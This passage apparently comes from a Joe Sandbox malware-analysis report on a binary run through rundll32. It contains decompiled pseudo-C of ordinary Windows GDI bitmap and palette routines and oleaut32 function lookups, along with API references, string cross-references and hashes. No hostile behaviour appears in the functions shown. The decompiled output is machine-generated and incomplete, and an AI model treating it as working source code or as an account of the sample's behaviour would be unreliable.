				 *0xe7f7f4 = E00E1DE1C("VarBstrFromCy", E00E1DCA8, _t91);
				 *0xe7f7f8 = E00E1DE1C("VarBstrFromDate", E00E1DD18, _t91);
				_t46 = E00E1DE1C("VarBstrFromBool", E00E1DD88, _t91);
				 *0xe7f7fc = _t46;
				return _t46;
			}

0x00e1de56
0x00e1de6a
0x00e1de80
0x00e1de96
0x00e1deac
0x00e1dec2
0x00e1ded8
0x00e1deee
0x00e1df04
0x00e1df1a
0x00e1df30
0x00e1df46
0x00e1df5c
0x00e1df72
0x00e1df88
0x00e1df9e
0x00e1dfb4
0x00e1dfca
0x00e1dfe0
0x00e1dff6
0x00e1e00c
0x00e1e022
0x00e1e032
0x00e1e038
0x00e1e03f

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 00E1DE51

Part of subcall function 00E1DE1C: GetProcAddress.KERNEL32(00000000), ref: 00E1DE35

Strings

VarI4FromStr, xrefs: 00E1DF7D
VarOr, xrefs: 00E1DF3B
VarR8FromStr, xrefs: 00E1DFA9
VarXor, xrefs: 00E1DF51
VarMul, xrefs: 00E1DECD
VarCmp, xrefs: 00E1DF67
VarNot, xrefs: 00E1DE8B
VarMod, xrefs: 00E1DF0F
VarCyFromStr, xrefs: 00E1DFD5
VarDateFromStr, xrefs: 00E1DFBF
VarAnd, xrefs: 00E1DF25
VarBoolFromStr, xrefs: 00E1DFEB
VarBstrFromBool, xrefs: 00E1E02D
VarSub, xrefs: 00E1DEB7
VarNeg, xrefs: 00E1DE75
VarIdiv, xrefs: 00E1DEF9
VariantChangeTypeEx, xrefs: 00E1DE5F
VarAdd, xrefs: 00E1DEA1
VarDiv, xrefs: 00E1DEE3
oleaut32.dll, xrefs: 00E1DE4C
VarBstrFromDate, xrefs: 00E1E017
VarBstrFromCy, xrefs: 00E1E001
VarR4FromStr, xrefs: 00E1DF93

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: e3439a72efb972361ef734710e58b9f061fd83137afe0ab45128ff8d87e69d4e
Instruction ID: 4c33e9c0f13b442dc113537450ba61192dca5ed20fbc4d7de6898cde34d0aa71
Opcode Fuzzy Hash: e3439a72efb972361ef734710e58b9f061fd83137afe0ab45128ff8d87e69d4e
Instruction Fuzzy Hash: 2A41F871A1C2455E5308AB6E7C034E7B7D9E7C8711364703BF818FB769D970A8E1872A

Uniqueness

Uniqueness Score: -1.00%

Function 00E31318 Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00E31318(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				struct HPALETTE__* _v40;
				intOrPtr* _t78;
				struct HPALETTE__* _t89;
				struct HPALETTE__* _t95;
				int _t171;
				intOrPtr _t178;
				intOrPtr _t180;
				struct HDC__* _t182;
				int _t184;
				void* _t186;
				void* _t187;
				intOrPtr _t188;

				_t186 = _t187;
				_t188 = _t187 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t182 = __eax;
				_t184 = _a16;
				_t171 = _a20;
				_v13 = 1;
				_t78 =  *0xe7e30c; // 0xe7c0d4
				if( *_t78 != 2 || _t171 != _a40 || _t184 != _a36) {
					_v40 = 0;
					_v20 = E00E31174(CreateCompatibleDC(0));
					_push(_t186);
					_push(0xe31598);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					_v24 = E00E31174(CreateCompatibleBitmap(_a32, _t171, _t184));
					_v28 = SelectObject(_v20, _v24);
					_t89 =  *0xe7f894; // 0x6008075c
					_v40 = SelectPalette(_a32, _t89, 0);
					SelectPalette(_a32, _v40, 0);
					if(_v40 == 0) {
						_t95 =  *0xe7f894; // 0x6008075c
						_v40 = SelectPalette(_v20, _t95, 0xffffffff);
					} else {
						_v40 = SelectPalette(_v20, _v40, 0xffffffff);
					}
					RealizePalette(_v20);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a12, _a8, _a4, _t171, _t184, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t171, _t184, _a32, _a28, _a24, _t171, _t184, 0x440328);
					_v32 = SetTextColor(_t182, 0);
					_v36 = SetBkColor(_t182, 0xffffff);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t171, _t184, 0x8800c6);
					StretchBlt(_t182, _v8, _v12, _a40, _a36, _v20, 0, 0, _t171, _t184, 0x660046);
					SetTextColor(_t182, _v32);
					SetBkColor(_t182, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t178);
					 *[fs:eax] = _t178;
					_push(0xe3159f);
					if(_v40 != 0) {
						SelectPalette(_v20, _v40, 0);
					}
					return DeleteDC(_v20);
				} else {
					_v24 = E00E31174(CreateCompatibleBitmap(_a32, 1, 1));
					_v24 = SelectObject(_a12, _v24);
					_push(_t186);
					_push(0xe313eb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t188;
					MaskBlt(_t182, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00E16CCC(0xaa0029, 0xcc0020));
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0xe3159f);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x00e31319
0x00e3131b
0x00e31321
0x00e31324
0x00e31327
0x00e31329
0x00e3132c
0x00e3132f
0x00e31333
0x00e3133b
0x00e313f4
0x00e31403
0x00e31408
0x00e31409
0x00e3140e
0x00e31411
0x00e31424
0x00e31434
0x00e31439
0x00e31448
0x00e31455
0x00e3145e
0x00e31476
0x00e31485
0x00e31460
0x00e3146f
0x00e3146f
0x00e3148c
0x00e314ae
0x00e314d0
0x00e314dd
0x00e314eb
0x00e31512
0x00e31537
0x00e31541
0x00e3154b
0x00e31554
0x00e3155e
0x00e3155e
0x00e31567
0x00e3156e
0x00e31571
0x00e31574
0x00e3157d
0x00e31589
0x00e31589
0x00e31597
0x00e31353
0x00e31365
0x00e31375
0x00e3137a
0x00e3137b
0x00e31380
0x00e31383
0x00e313bf
0x00e313c6
0x00e313c9
0x00e313cc
0x00e313de
0x00e313ea
0x00e313ea

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00E3135B
SelectObject.GDI32(?,?), ref: 00E31370
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00E313EB,?,?), ref: 00E313BF
SelectObject.GDI32(?,?), ref: 00E313D9
DeleteObject.GDI32(?), ref: 00E313E5
CreateCompatibleDC.GDI32(00000000), ref: 00E313F9
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00E3141A
SelectObject.GDI32(?,?), ref: 00E3142F
SelectPalette.GDI32(?,6008075C,00000000), ref: 00E31443
SelectPalette.GDI32(?,?,00000000), ref: 00E31455
SelectPalette.GDI32(?,00000000,000000FF), ref: 00E3146A
SelectPalette.GDI32(?,6008075C,000000FF), ref: 00E31480
RealizePalette.GDI32(?), ref: 00E3148C
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00E314AE
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00E314D0
SetTextColor.GDI32(?,00000000), ref: 00E314D8
SetBkColor.GDI32(?,00FFFFFF), ref: 00E314E6
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00E31512
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00E31537
SetTextColor.GDI32(?,?), ref: 00E31541
SetBkColor.GDI32(?,?), ref: 00E3154B
SelectObject.GDI32(?,00000000), ref: 00E3155E
DeleteObject.GDI32(?), ref: 00E31567
SelectPalette.GDI32(?,00000000,00000000), ref: 00E31589
DeleteDC.GDI32(?), ref: 00E31592

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
String ID:
API String ID: 3976802218-0
Opcode ID: 18008df3857d12db0402c764b9252e9c068d1e5cee8d2a485364830dd5e08615
Instruction ID: 62595e907bcf813fff1054996288a588c253049c05c1077a2855c0e175a8725a
Opcode Fuzzy Hash: 18008df3857d12db0402c764b9252e9c068d1e5cee8d2a485364830dd5e08615
Instruction Fuzzy Hash: 78819DB2A00209AFDB50EFA8CD85EEF7BECAB0D714F151558F618F7281C634AD408B61

Uniqueness

Uniqueness Score: -1.00%

Function 00E3481C Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E3481C(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00E33D10(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0xe34a17);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E00E31174(GetDC(0));
					_v20 = E00E31174(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L17:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0xe34a1e);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E00E31174(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0xe349cf);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E00E34154(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0xe349d6);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x00e3481d
0x00e3481f
0x00e34825
0x00e34827
0x00e34829
0x00e3482d
0x00e34832
0x00e34a27
0x00e3484c
0x00e3484e
0x00e34855
0x00e3485a
0x00e3485f
0x00e34860
0x00e34865
0x00e34868
0x00e34877
0x00e34888
0x00e3489e
0x00e348a5
0x00e349e9
0x00e349e9
0x00e349eb
0x00e349ee
0x00e349f1
0x00e349fa
0x00e34a00
0x00e34a00
0x00e34a09
0x00000000
0x00e34a11
0x00e34a16
0x00e348ab
0x00e348b8
0x00e348c1
0x00e348ed
0x00e348f2
0x00e348f3
0x00e348f8
0x00e348fb
0x00e34902
0x00e34922
0x00e34904
0x00e34904
0x00e3490a
0x00e3491e
0x00e3491e
0x00e34930
0x00e34935
0x00e3493e
0x00e34947
0x00e34953
0x00e3495c
0x00e3495c
0x00e34966
0x00e3498a
0x00e34994
0x00e3499d
0x00e349a7
0x00e349a7
0x00e349b0
0x00e349b3
0x00e349b3
0x00e349ba
0x00e349bd
0x00e349c0
0x00e349ce
0x00e348c3
0x00e348d5
0x00e349da
0x00e349e4
0x00e349e4
0x00000000
0x00e349da
0x00e348c1
0x00e348a5

APIs

GetObjectA.GDI32(?,00000054,?), ref: 00E3483F
GetDC.USER32(00000000), ref: 00E3486D
CreateCompatibleDC.GDI32(?), ref: 00E3487E
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00E34899
SelectObject.GDI32(?,00000000), ref: 00E348B3
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 00E348D5
CreateCompatibleDC.GDI32(?), ref: 00E348E3
SelectObject.GDI32(?), ref: 00E3492B
SelectPalette.GDI32(?,?,00000000), ref: 00E3493E
RealizePalette.GDI32(?), ref: 00E34947
SelectPalette.GDI32(?,?,00000000), ref: 00E34953
RealizePalette.GDI32(?), ref: 00E3495C
SetBkColor.GDI32(?), ref: 00E34966
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00E3498A
SetBkColor.GDI32(?,00000000), ref: 00E34994
SelectObject.GDI32(?,00000000), ref: 00E349A7
DeleteObject.GDI32 ref: 00E349B3
DeleteDC.GDI32(?), ref: 00E349C9
SelectObject.GDI32(?,00000000), ref: 00E349E4
DeleteDC.GDI32(00000000), ref: 00E34A00
ReleaseDC.USER32 ref: 00E34A11

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
String ID:
API String ID: 332224125-0
Opcode ID: 7331a18b7bd76e054cf70d41f6963aa7e9bc8ebd63e4d92d5464113f4522a71f
Instruction ID: 1a09acef02c71f1fe60d09ea2703e2c6d4842cff67f893ced3b879e4608f9fa9
Opcode Fuzzy Hash: 7331a18b7bd76e054cf70d41f6963aa7e9bc8ebd63e4d92d5464113f4522a71f
Instruction Fuzzy Hash: E051EDB1E40319ABDB10EBE88C5AFEEBBFCAB49700F115855B614F7281D674A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E35624 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00E35624(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00E126CC(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0xe35b41);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0xe35b14);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00E13244(1);
						if(_a4 == 0) {
							E00E12C80( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00E29144(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t261 = _v64;
					E00E12C80(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E00E31054();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E00E290D4(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E00E312E4( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E00E290D4(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E00E31304( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E00E315AC(_v32);
				}
				_v16 = E00E31174(GetDC(0));
				_push(_t333);
				_push(0xe35a8f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0xe7c460 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E00E1CDE4(_t255, _t267, _t327, _t331);
							} else {
								E00E31054();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E00E290D4(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0xe35a5e;
						 *[fs:eax] = _t300;
						_push(0xe35a96);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00E126CC(_t331);
					_push(_t333);
					_push(0xe359f7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E00E290D4(_v12, _t331, _v24);
					_v20 = E00E31174(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E00E31864(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0xe359cb);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E00E1CDE4(_t255, _t273, _t327, _t331);
						} else {
							E00E31054();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0xe359d2);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00e35624
0x00e35625
0x00e35627
0x00e35630
0x00e35632
0x00e35635
0x00e3563a
0x00e3563f
0x00e35644
0x00e35654
0x00e3565b
0x00e35663
0x00e35665
0x00e35665
0x00e3567c
0x00e35682
0x00e35687
0x00e35688
0x00e3568d
0x00e35690
0x00e35695
0x00e35696
0x00e3569b
0x00e3569e
0x00e356a5
0x00e35704
0x00e35707
0x00e3570d
0x00e35713
0x00e3572d
0x00e35734
0x00e35743
0x00e35748
0x00e35756
0x00e35762
0x00e35762
0x00e35772
0x00e35782
0x00e35796
0x00e357a5
0x00e357b7
0x00e357bd
0x00e357bd
0x00e356a7
0x00e356b7
0x00e356ba
0x00e356c6
0x00e356cb
0x00e356d1
0x00e356d8
0x00e356df
0x00e356e7
0x00e356eb
0x00e356eb
0x00e357c0
0x00e357c6
0x00e357ce
0x00e357d6
0x00e357d8
0x00e357d8
0x00e357e1
0x00e357e3
0x00e357eb
0x00e357f7
0x00e35804
0x00e35809
0x00e3580d
0x00e3580d
0x00e357f7
0x00e357eb
0x00e35814
0x00e3581f
0x00e3581f
0x00e35825
0x00e35831
0x00e3583a
0x00e3584c
0x00e35852
0x00e35854
0x00e35860
0x00e3586a
0x00e3586f
0x00e35872
0x00e35872
0x00e35875
0x00e3587a
0x00e3587c
0x00e3587c
0x00e35882
0x00e35887
0x00e35887
0x00e35898
0x00e3589d
0x00e3589e
0x00e358a3
0x00e358a6
0x00e358ac
0x00e358b1
0x00e358bf
0x00e35a15
0x00e35a1c
0x00e35a2b
0x00e35a34
0x00e35a2d
0x00e35a2d
0x00e35a2d
0x00e35a2b
0x00e35a3b
0x00e35a41
0x00e35a44
0x00e35a4f
0x00e35a56
0x00e35a59
0x00e35a78
0x00e35a7b
0x00e35a7e
0x00e35a8e
0x00000000
0x00000000
0x00000000
0x00e358c5
0x00e358c5
0x00e358c7
0x00e358d1
0x00e358d6
0x00e358d7
0x00e358dc
0x00e358df
0x00e358e5
0x00e358ea
0x00e358fd
0x00e35917
0x00e3591c
0x00e35922
0x00e35927
0x00e35929
0x00e35935
0x00e35947
0x00e3594e
0x00e3594e
0x00e35955
0x00e35956
0x00e3595b
0x00e3595e
0x00e35977
0x00e3597e
0x00e35987
0x00e35990
0x00e35989
0x00e35989
0x00e35989
0x00e35987
0x00e35997
0x00e3599a
0x00e3599d
0x00e359a6
0x00e359b2
0x00e359b2
0x00e359ca
0x00e359ca

APIs

GetDC.USER32(00000000), ref: 00E3588E
CreateCompatibleDC.GDI32(00000001), ref: 00E358F3
CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00E35908
SelectObject.GDI32(?,00000000), ref: 00E35912
SelectPalette.GDI32(?,?,00000000), ref: 00E35942
RealizePalette.GDI32(?), ref: 00E3594E
CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 00E35972
GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00E359CB,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 00E35980
SelectPalette.GDI32(?,00000000,000000FF), ref: 00E359B2
SelectObject.GDI32(?,?), ref: 00E359BF
DeleteObject.GDI32(00000000), ref: 00E359C5

Strings

lT, xrefs: 00E35723
(, xrefs: 00E357DD
BM, xrefs: 00E35748

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
String ID: ($BM$lT
API String ID: 2831685396-3738863254
Opcode ID: ff4f5bb0e238b8ca823669f6ed7b8b8e4dfe51225d98dead30258f892b959cd0
Instruction ID: 12c8da3cf57cf0999b835b49eb7a62f6e4281a2f680f47194d2075fe96c9760d
Opcode Fuzzy Hash: ff4f5bb0e238b8ca823669f6ed7b8b8e4dfe51225d98dead30258f892b959cd0
Instruction Fuzzy Hash: 5ED12575A006089FDF14EFA8C889AAEBBF5FF48304F149569E914FB395D7349880CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E34D20 Relevance: 21.2, APIs: 14, Instructions: 217
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00E34D20(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				struct tagPOINT _v21;
				struct HDC__* _v28;
				void* _v32;
				struct HPALETTE__* _t78;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				char _t87;
				void* _t94;
				void* _t140;
				intOrPtr* _t170;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr _t184;
				intOrPtr _t186;
				int* _t190;
				intOrPtr _t192;
				void* _t194;
				void* _t195;
				intOrPtr _t196;

				_t171 = __ecx;
				_t194 = _t195;
				_t196 = _t195 + 0xffffffe4;
				_t190 = __ecx;
				_v8 = __edx;
				_t170 = __eax;
				_t192 =  *((intOrPtr*)(__eax + 0x28));
				_t178 =  *0xe34f6c; // 0xf
				E00E30E50(_v8, __ecx, _t178);
				E00E3539C(_t170);
				_v12 = 0;
				_v13 = 0;
				_t78 =  *(_t192 + 0x10);
				if(_t78 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t78, 0xffffffff);
					RealizePalette( *(_v8 + 4));
					_v13 = 1;
				}
				_push(GetDeviceCaps( *(_v8 + 4), 0xc));
				_t84 = GetDeviceCaps( *(_v8 + 4), 0xe);
				_pop(_t85);
				_t86 = _t85 * _t84;
				if(_t86 > 8) {
					L4:
					_t87 = 0;
				} else {
					_t171 =  *(_t192 + 0x28) & 0x0000ffff;
					if(_t86 < ( *(_t192 + 0x2a) & 0x0000ffff) * ( *(_t192 + 0x28) & 0x0000ffff)) {
						_t87 = 1;
					} else {
						goto L4;
					}
				}
				if(_t87 == 0) {
					if(E00E350AC(_t170) == 0) {
						SetStretchBltMode(E00E30D7C(_v8), 3);
					}
				} else {
					GetBrushOrgEx( *(_v8 + 4),  &_v21);
					SetStretchBltMode( *(_v8 + 4), 4);
					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
				}
				_push(_t194);
				_push(0xe34f5c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196;
				if( *((intOrPtr*)( *_t170 + 0x28))() != 0) {
					E00E3533C(_t170, _t171);
				}
				_t94 = E00E34FF0(_t170);
				_t182 =  *0xe34f6c; // 0xf
				E00E30E50(_t94, _t171, _t182);
				if( *((intOrPtr*)( *_t170 + 0x28))() == 0) {
					StretchBlt( *(_v8 + 4),  *_t190, _t190[1], _t190[2] -  *_t190, _t190[3] - _t190[1],  *(E00E34FF0(_t170) + 4), 0, 0,  *(_t192 + 0x1c),  *(_t192 + 0x20),  *(_v8 + 0x20));
					_pop(_t184);
					 *[fs:eax] = _t184;
					_push(0xe34f63);
